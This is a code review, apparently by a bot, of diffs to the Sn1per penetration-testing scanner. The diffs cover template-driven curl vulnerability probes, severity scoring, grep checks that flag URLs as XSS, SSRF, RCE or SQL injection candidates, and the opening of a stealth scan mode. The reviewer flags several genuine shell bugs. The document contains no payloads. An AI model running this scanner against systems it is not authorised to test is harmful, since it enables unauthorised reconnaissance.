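Review bot: the `sed -ie 's/<BR>/\n/g' FILE` followed by `mv -f FILE.txte FILE` pairs (Sublist3r block, dnscan block and the final `domains-$TARGET-full.txt` merge) undo their own edit. With GNU sed `-ie` is `-i` with backup suffix `e`, so `FILE.txte` holds the original, and `mv -f`-ing it back overwrites the edited file, leaving any `<BR>` in place; use `sed -i 's/<BR>/\n/g' FILE` and drop the `mv`. The Sublist3r occurrence also targets a relative `domains-$TARGET-full.txt` while the `mv` that follows it names `$LOOT_DIR/domains/domains-$TARGET.txt`. Further logic problems in this hunk: `egrep -iE "GREP_INTERESTING_SUBDOMAINS"` greps for that literal string instead of `$GREP_INTERESTING_SUBDOMAINS`, so `domains_interesting-$TARGET.txt` is always empty; `[[ $(wc -c ...) > 3 ]]` is a string comparison inside `[[ ]]` (`"10" > "3"` is false), so the new-domains notification is skipped for many byte counts, use `-gt`; and `domains-$TARGET-presorted-nowildcards.txt` is derived from `domains-$TARGET.txt` (Sublist3r and dnscan output only) rather than the merged `-presorted.txt`, so massdns never resolves the crt.sh, amass, subfinder, Shodan, Censys, GitHub or RapidDNS names and they land in `-full.txt` unvalidated. Lastly, `~/go/src/github.com/Ice3man543/SubOver` and `~/go/src/github.com/haccer/subjack/fingerprints.json` are GOPATH-layout paths that do not exist on a module-mode Go install, and the `cd` into the former is unchecked, so `subover` silently runs from the wrong directory; the subfinder call hardcodes `/sniper/wordlists/resolvers.txt`, a prefix used nowhere else in the hunk, and its banner advertises `-t 100` while the command runs `-t $THREADS`.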


@@ -0,0 +1,18 @@
for file in `ls $INSTALL_DIR/templates/active/*.sh 2> /dev/null`; do
source $file
OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
if [[ "$SSL" == "true" ]]; then
if [[ -z "$PORT" ]]; then
PORT="443"
fi
rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$PORT-$OUTPUT_NAME.txt" 2> /dev/null
curl --connect-timeout 3 --max-time 5 -k -X $METHOD $CURL_OPTS "https://${TARGET}:${PORT}${URI}" 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME,https://${TARGET}:${PORT}${URI},$(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$PORT-$OUTPUT_NAME.txt" 2> /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: https://${TARGET}:${PORT}${URI} - EVIDENCE: $(cat /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
else
if [[ -z "$PORT" ]]; then
PORT="80"
fi
rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$PORT-$OUTPUT_NAME.txt" 2> /dev/null
curl --connect-timeout 3 --max-time 5 -k -X $METHOD $CURL_OPTS "http://${TARGET}:${PORT}${URI}" 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME,http://${TARGET}:${PORT}${URI},$(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$PORT-$OUTPUT_NAME.txt" 2> /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://${TARGET}:${PORT}${URI} - EVIDENCE: $(cat /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
rm -f /tmp/${TARGET}_${OUTPUT_NAME}.out 2> /dev/null
done
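Review bot: variables set by one sourced template leak into the next. `source $file` runs in the loop's own shell and nothing unsets `PORT`, `SSL`, `METHOD`, `URI`, `CURL_OPTS`, `GREP_OPTIONS` or `SECONDARY_COMMANDS` between iterations, while `if [[ -z "$PORT" ]]` only applies the 443/80 default when the variable is empty; a template that sets `PORT="8443"` therefore makes every later template that expects the default probe 8443 as well. Unset the template variables at the top of each iteration. Two more points: `/tmp/${TARGET}_${OUTPUT_NAME}.out` is a predictable name in a world-writable directory, written with `>` as whatever user runs the scan, so a local user who pre-creates it (or a symlink) controls what gets clobbered; use `mktemp`. And `sed -r "s/</\&lh\;/g"` emits `&lh;`, which is not an HTML entity (`&lt;` is), so the evidence field is not rendered as an escaped `<` in the report.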


@@ -0,0 +1,20 @@
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING SC0PE NETWORK VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
for file in `ls $INSTALL_DIR/templates/passive/network/*.sh 2> /dev/null`; do
source $file
OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
if [[ "$SEARCH" == "negative" ]]; then
rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out || echo "$SEVERITY, $VULN_NAME, $TARGET, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $TARGET - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
else
rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME, $TARGET, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $FILENME - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
rm -f /tmp/${TARGET}_${OUTPUT_NAME}.out 2> /dev/null
done
for file in `ls $INSTALL_DIR/templates/passive/network/recursive/*.sh 2> /dev/null`; do
source $file
done
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
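Review bot: in the `"$SEARCH" == "negative"` branch (the `|| echo` chain) a finding is reported whenever `egrep` finds no match, which includes the case where `$FILENAME` does not exist or is empty because the producing scan step was skipped or failed; `cat $FILENAME 2> /dev/null` hides exactly that error. Guard the negative check with `[[ -s "$FILENAME" ]]` so an absent input is treated as "not checked" rather than as a vulnerability. Also, the notification line in the positive branch references `$FILENME` (typo for `$FILENAME`), so the file field in `notifications_new.txt` will be blank, and the `ls`-in-backticks loop should be `for file in "$INSTALL_DIR"/templates/passive/network/*.sh` with an `[[ -e "$file" ]]` guard (no `ls`, no word splitting on paths). Since every template is `source`d with the scanner's privileges, the templates directory needs to be owned by root and not group/world writable; that requirement belongs in the documentation this commit adds.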


@@ -0,0 +1,38 @@
for file in `ls $INSTALL_DIR/templates/passive/web/*.sh 2> /dev/null`; do
source $file
OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
if [[ "$SEARCH" == "negative" ]]; then
if [[ "$SSL" == "true" ]]; then
if [[ -z "$PORT" ]]; then
PORT="443"
fi
rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out || echo "$SEVERITY, $VULN_NAME, https://$TARGET:$PORT/$URI, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: $TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
else
if [[ -z "$PORT" ]]; then
PORT="80"
fi
rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out || echo "$SEVERITY, $VULN_NAME, http://$TARGET:$PORT/$URI, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
else
if [[ "$SSL" == "true" ]]; then
if [[ -z "$PORT" ]]; then
PORT="443"
fi
rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME, https://$TARGET:$PORT/$URI, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: $TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
else
if [[ -z "$PORT" ]]; then
PORT="80"
fi
rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME, http://$TARGET:$PORT/$URI, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
fi
rm -f /tmp/${TARGET}_${OUTPUT_NAME}.out 2> /dev/null
done
for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do
source $file
done
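Review bot: `PORT` and `SSL` leak between iterations. Each template is `source`d into the same shell, and `if [[ -z "$PORT" ]]; then PORT="443"` only defaults when the variable is unset, so a template that does not set `PORT` inherits whatever the previous template (or this default) left behind; the same applies to `SSL`, `SEARCH`, `URI` and `SECONDARY_COMMANDS`. Reset them at the top of the loop body (`unset PORT SSL URI SEARCH SECONDARY_COMMANDS`) before `source $file`. Related: the output file `sc0pe-$TARGET-https-$OUTPUT_NAME.txt` omits the port, unlike the active templates earlier in this commit which write `sc0pe-$TARGET-http-$PORT-$OUTPUT_NAME.txt`, so the same template matching on two TLS ports overwrites its own result; and the two https notification lines print `URL: $TARGET:$PORT/$URI` without the `https://` scheme that the http branch includes.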

36
modes/sc0pe.sh Normal file

@@ -0,0 +1,36 @@
echo "====================================================================================" | tee $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
CRITICAL_VULNS=$(egrep CRITICAL $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | wc -l)
HIGH_VULNS=$(egrep HIGH $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | wc -l)
MEDIUM_VULNS=$(egrep MEDIUM $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | wc -l)
LOW_VULNS=$(egrep LOW $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | wc -l)
INFO_VULNS=$(egrep INFO $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | wc -l)
VULN_SCORE=$(($CRITICAL_VULNS*5+$HIGH_VULNS*4+$MEDIUM_VULNS*3+$LOW_VULNS*2+$INFO_VULNS*1))
echo "•?((¯°·..• Sc0pe Vulnerability Report by @xer0dayz •._.·°¯))؟• " | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
echo "====================================================================================" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
echo "Critical: $CRITICAL_VULNS" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
echo "High: $HIGH_VULNS" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
echo "Medium: $MEDIUM_VULNS" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
echo "Low: $LOW_VULNS" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
echo "Info: $INFO_VULNS" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
echo "Score: $VULN_SCORE" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
echo "$VULN_SCORE" 2> /dev/null > $LOOT_DIR/vulnerabilities/vulnerability-risk-$TARGET.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
echo "====================================================================================" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
egrep -h CRITICAL $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
egrep -h HIGH $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
egrep -h MEDIUM $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
egrep -h LOW $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
egrep -h INFO $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
echo "====================================================================================" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
sort -u $LOOT_DIR/vulnerabilities/sc0pe-*.txt > $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null
egrep "CRITICAL" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/critical_vulns_total.txt
egrep "HIGH" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/high_vulns_total.txt
egrep "MEDIUM" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/medium_vulns_total.txt
egrep "LOW" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/low_vulns_total.txt
egrep "INFO" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/info_vulns_total.txt
WORKSPACE_RISK_CRITCAL=$(cat $LOOT_DIR/vulnerabilities/critical_vulns_total.txt 2> /dev/null)
WORKSPACE_RISK_HIGH=$(cat $LOOT_DIR/vulnerabilities/high_vulns_total.txt 2> /dev/null)
WORKSPACE_RISK_MEDIUM=$(cat $LOOT_DIR/vulnerabilities/medium_vulns_total.txt 2> /dev/null)
WORKSPACE_RISK_LOW=$(cat $LOOT_DIR/vulnerabilities/low_vulns_total.txt 2> /dev/null)
WORKSPACE_RISK_INFO=$(cat $LOOT_DIR/vulnerabilities/info_vulns_total.txt 2> /dev/null)
WORKSPACE_RISK_TOTAL=$(($WORKSPACE_RISK_CRITCAL*5+$WORKSPACE_RISK_HIGH*4+$WORKSPACE_RISK_MEDIUM*3+$WORKSPACE_RISK_LOW*2+$WORKSPACE_RISK_INFO*1))
echo "$WORKSPACE_RISK_TOTAL" > $LOOT_DIR/vulnerabilities/vuln_score_total.txt 2> /dev/null
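Review bot: the severity counts are substring matches over the whole CSV line (`egrep CRITICAL`, `egrep LOW`, ...), not on the severity field, so a line whose vulnerability name or evidence contains `HIGH`, `LOW` (also inside `ALLOW`/`FOLLOW`) or `INFO` (inside `INFORMATION`) is counted under two severities, the same line is listed twice by the `egrep -h` block, and the score written to `vulnerability-risk-$TARGET.txt` inherits the error. Match on the first field instead, e.g. `awk -F, '$1 == "CRITICAL"'` or `egrep '^CRITICAL,'`, in both the per-target counts and the workspace totals. Two smaller points: in the `echo "$VULN_SCORE" ... > $LOOT_DIR/vulnerabilities/vulnerability-risk-$TARGET.txt ... | tee -a` line stdout is redirected to the file before the pipe, so `tee` receives nothing and the `| tee -a ...` part is dead code (and `2> /dev/null` appears twice); and `WORKSPACE_RISK_CRITCAL` is misspelled (consistently, so it works today, but it will not turn up in a grep for `CRITICAL`).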


@@ -0,0 +1,46 @@
if [[ $STATIC_GREP_SEARCH == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING INTERESTING EXTENSIONS STATIC ANALYSIS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_EXTENSIONS" | tee $LOOT_DIR/web/static-extensions-$TARGET.txt | head -n $GREP_MAX_LINES
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING INTERESTING PARAMETERS STATIC ANALYSIS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_PARAMETERS" | tee $LOOT_DIR/web/static-parameters-$TARGET.txt | head -n $GREP_MAX_LINES
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING XSS STATIC ANALYSIS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_XSS" | tee $LOOT_DIR/web/static-xss-$TARGET.txt | head -n $GREP_MAX_LINES
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING SSRF STATIC ANALYSIS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_SSRF" | tee $LOOT_DIR/web/static-ssrf-$TARGET.txt | head -n $GREP_MAX_LINES
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING REDIRECT STATIC ANALYSIS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_REDIRECT" | tee $LOOT_DIR/web/static-redirect-$TARGET.txt | head -n $GREP_MAX_LINES
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING RCE STATIC ANALYSIS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_RCE" | tee $LOOT_DIR/web/static-rce-$TARGET.txt | head -n $GREP_MAX_LINES
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING IDOR STATIC ANALYSIS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_IDOR" | tee $LOOT_DIR/web/static-idor-$TARGET.txt | head -n $GREP_MAX_LINES
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING SQL STATIC ANALYSIS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_SQL" | tee $LOOT_DIR/web/static-sql-$TARGET.txt | head -n $GREP_MAX_LINES
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING LFI STATIC ANALYSIS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_LFI" | tee $LOOT_DIR/web/static-lfi-$TARGET.txt | head -n $GREP_MAX_LINES
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING SSTI STATIC ANALYSIS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_SSTI" | tee $LOOT_DIR/web/static-ssti-$TARGET.txt | head -n $GREP_MAX_LINES
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING DEBUG STATIC ANALYSIS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_DEBUG" | tee $LOOT_DIR/web/static-debug-$TARGET.txt | head -n $GREP_MAX_LINES
fi
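Review bot: every `... | tee $LOOT_DIR/web/static-*-$TARGET.txt | head -n $GREP_MAX_LINES` pipeline truncates the saved file, not just the terminal output: once `head` has printed `$GREP_MAX_LINES` lines it exits, `tee` receives SIGPIPE on its next write and dies, and whatever `egrep` had not yet flushed is lost, so the on-disk results are capped at roughly the display limit. Write the file first and display from it, e.g. `egrep -iE "$GREP_XSS" > "$LOOT_DIR/web/static-xss-$TARGET.txt"` followed by `head -n "$GREP_MAX_LINES" "$LOOT_DIR/web/static-xss-$TARGET.txt"`, and apply the same change to all eleven checks. Style: the eleven blocks differ only in the pattern variable and the output suffix; one loop over `extensions:GREP_EXTENSIONS parameters:GREP_PARAMETERS ...` pairs with `${!var}` indirection would cut this hunk to a third of its size and keep the banners consistent.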

531
modes/stealth.sh Normal file

@@ -0,0 +1,531 @@
# STEALTH MODE #####################################################################################################
if [[ "$MODE" = "stealth" ]]; then
if [[ "$REPORT" = "1" ]]; then
args="-t $TARGET"
if [[ "$OSINT" = "1" ]]; then
args="$args -o"
fi
if [[ "$AUTO_BRUTE" = "1" ]]; then
args="$args -b"
fi
if [[ "$FULLNMAPSCAN" = "1" ]]; then
args="$args -fp"
fi
if [[ "$RECON" = "1" ]]; then
args="$args -re"
fi
if [[ ! -z "$WORKSPACE" ]]; then
args="$args -w $WORKSPACE"
LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $LOOT_DIR 2> /dev/null
mkdir $LOOT_DIR/domains 2> /dev/null
mkdir $LOOT_DIR/screenshots 2> /dev/null
mkdir $LOOT_DIR/nmap 2> /dev/null
mkdir $LOOT_DIR/notes 2> /dev/null
mkdir $LOOT_DIR/reports 2> /dev/null
mkdir $LOOT_DIR/scans 2> /dev/null
mkdir $LOOT_DIR/output 2> /dev/null
fi
args="$args --noreport -m stealth"
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
exit
fi
echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[ https://sn1persecurity.com"
echo -e "$OKORANGE + -- --=[ Sn1per v$VER by @xer0dayz"
echo -e "$OKRED "
echo -e "$OKRED ./\."
echo -e "$OKRED ./ '\."
echo -e "$OKRED \. '\."
echo -e "$OKRED '\. '\."
echo -e "$OKRED '\. '\."
echo -e "$OKRED '\. '\."
echo -e "$OKRED ./ '\."
